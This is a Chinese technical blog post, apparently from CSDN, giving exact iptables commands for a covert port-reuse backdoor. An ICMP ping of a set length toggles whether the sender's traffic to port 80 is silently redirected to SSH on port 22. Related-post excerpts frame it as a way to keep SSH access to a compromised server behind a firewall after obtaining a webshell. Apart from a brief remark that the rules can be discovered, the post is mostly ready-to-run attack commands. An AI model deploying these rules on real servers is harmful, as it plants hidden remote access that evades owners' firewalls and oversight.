远程遥控IPTables进行端口复用

已于 2023-08-15 22:00:05 修改
阅读量819 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 服务器 linux 网络
于 2023-08-15 20:28:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/132305292
版权

一、配置(通过ip进行ping)

1.创建复用链

iptables -t nat -N LETMEIN

2.创建端口复用将流量转发到22端口上

iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22

 3.开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为letmein的列表中

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT

4.关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT

5. 如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

含义:如果新来ip在我们之前添加的列表中,我们就会转到自定义链,自定义链就会将我们流量转至22端口上

 6.查看

总结:相当于80和22为同一个端口 

二、使用ubuntu来做测试

解释:

开启复用 ping -c 1 -s 1111 192.168.170.136

向目标发送一个长度为 1111 的 ICMP 数据包(加上包头28,总长度实际为1139)

关闭复用 ping -c 1 -s 1112 192.168.170.136 向目标发送一个长度为 1112 的 ICMP 数据包(加上包头 28,总长度实际为 1140)

备注:经常查表不然容易被装后门

 虽然很隐蔽但是可被查找到(centos机):

凌晨五点的星
关注
专栏目录
Linux利用iptables端口复用
谢公子的博客
05-02 2337
在做渗透测试的过程中,我们经常会遇到下面这种问题。 目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是该主机的22端口不对外开放。现在我们想远程SSH连接到目标主机。 ...
远程遥控iptables进行端口复用以及SSLH工具使用
m0_68390300的博客
02-02 313
iptables端口复用以及sslh工具使用
icmp端口_Linux利用iptables端口复用
weixin_39771351的博客
12-01 357
目录iptables端口复用方案一:(根据源地址做端口复用)方案二:(根据源地址源端口端口复用)方案三:(利用ICMP协议做遥控开关)方案四:(利用TCP协议做遥控开关)iptables端口复用在做渗透测试的过程中,我们经常会遇到下面这种问题。目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密...
linux下用用iptables端口映射的shell
我的专栏
03-12 178
情形一:跨网络、跨主机的映射Full-Nat 我们想到达主机B的80端口,但是由于网络限制可能无法直接完成。但是我们可以到达主机A的8080端口,而主机A可以直接到达B的80端口。 这时候可以使用iptables,将主机B的80端口映射到主机A的8080端口,通过访问A的8080相当于访问B的80。实现如下: 在主机A上直接如下命令,实现端口映射的Full-Nat #!/bin/bash ...
linux系统下端口复用技术
09-23
linux系统下端口复用技术,介绍Linux系统端口复用的教程
IPtables进行端口复用
weixin_64311421的博客
02-02 634
iptables端口复用的两种方式
iptables端口复用后门+sslh
m0_56501091的博客
02-03 281
端口复用是不同的应用程序使用相同的端口进行通讯,在内网渗透中,服务器仅允许指定的端口开放,利用端口复用可以把例如3389端口转发到80端口进行外部连接。目的:服务器一般部署在内网,仅有web服务用于被访问,我们将其他的服务通过端口复用绑定在80端口上,相当于给自己留下了一个后门。4、创建关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉。3、创建开启开关,如果接收到长1139的ICMP包,则将来源ip添加到letmein的列表中。
Linuxiptables 禁止端口和开放端口示例
09-15
本篇文章主要介绍了Linuxiptables 禁止端口和开放端口示例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
记一次ubuntu利用iptables端口转发的操作
01-09
同事从海外远程连接国内某云上的一台机器3389端口,发现因为运营商路由原因非常慢,找运营商修改路由又非常麻烦。于是曲线救国,找了国内一台到两边访问都较快的机器做为跳板,做一个端口转发,以加速云机器3389端口...
iptables实现端口复用
好好睡觉
02-02 1695
iptables端口复用、centos下的sslh使用
利用iptable实现ssh端口复用后门
最新发布
qq_68163788的博客
11-20 1501
Linux系统中,可以使用iptables来实现SSH端口复用后门。SSH端口复用后门是一种隐藏在SSH服务中的后门,可以通过修改iptables规则来实现。 首先,需要确保iptables已经安装在系统中。上面的命令中,是指定的用于后门的端口号,是原本的SSH服务端口号。 接下来,需要修改SSH配置文件,将监听端口改为新的端口号。打开SSH配置文件(通常是/etc/ssh/sshd_config),找到Port项,并将原本的SSH端口号改为新的端口号。
iptables端口复用
weixin_62870380的博客
02-05 243
目的:如果发现SYN包的来源IP处于jack列表中,将直接转到HTTP_SSH_PORT链上进行处理,有效时间为3600秒。目的:如果接受到一个长为1139的ICMP包,则将来源IP添加到为jack的列表中。此时使用80端口进行远程连接,实现了80端口在22端口复用,且成功连接。五、将发现的数据包转到HTTP_SSH_PORT链上进行处理。五、将发现的数据包转到HTTP_SSH_PORT链上进行处理。五、将发现的数据包转到HTTP_SSH_TO链上进行处理。方式二:利用tcp数据包中的关键字做遥控开关。
iptables端口复用_远程操控
m0_63069714的博客
02-02 341
目的:如果发现SYN包的来源IP处于jack列表中,将直接转到HTTP_SSH_PORT链上进行处理,有效时间为3600秒。缺点:如果目标在内网,有可能无法直接 ping 到它,原因可能存在对方使用防火墙将ping直接关闭。目的:如果接受到一个长为1139的ICMP包,则将来源IP添加到为jack的列表中。目的:如果收到一个长为1140的ICMP包,则将来源IP从jack列表中去掉。此时使用80端口进行远程连接,实现了80端口在22端口复用,且成功连接。此时使用80端口进行远程连接将无法连接成功。
iptables进行端口复用与SSLH工具使用
qq_51204045的博客
02-03 775
安装 SSLH 时,将提示你是要将 sslh 作为从 inetd 运行的服务,还是作为独立服务器运行。另一方面,如果有很多连接,sslh 应作为独立服务器运行,以避免为每个传入连接生成新进程。let’s do it,如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒。开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为letmein的列表中。定义:端口复用是指不同的应用程序使用相同端口进行通讯。
iptables端口复用后门两种办法
qtttgeq的博客
02-03 180
网络安全基础
远程遥控 IPTables 进行端口复用
weixin_43639741的博客
04-17 1059
这篇首发在 ThreatHunter 社区:国内首个专注于高级威胁发现与安全数据分析的社区,请大家多多支持,https://threathunter.org。 有一天坐地铁的时候突然想到利用 iptables nat 表的 PREROUTING 链配合 REDIRECT 应该是可以达到端口复用的效果的。 比如在服务器的 PREROUTING 链里面加一条规则,将到本机 80 端口的流量 REDIR...
突破防火墙
weixin_30770783的博客
05-25 802
来源:黑客防线作者:dangguai27 如何在溢出后得到安全的、隐蔽的Shell是大家一直都在讨论的问题,因为现在的防火墙和各种安全软件漫天飞,想不被它们发现还真是很难,幸好有很多牛人们用自己的实力探索出了一条这样的道路,让我们这些人能顺着前辈的步伐一点点进步。本文给出了两种目前比较先进的端口复用技术,用在溢出后的端口绑定和Shell的获取,目前防火墙和各种安全工具对这样的技术还是陌生的,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值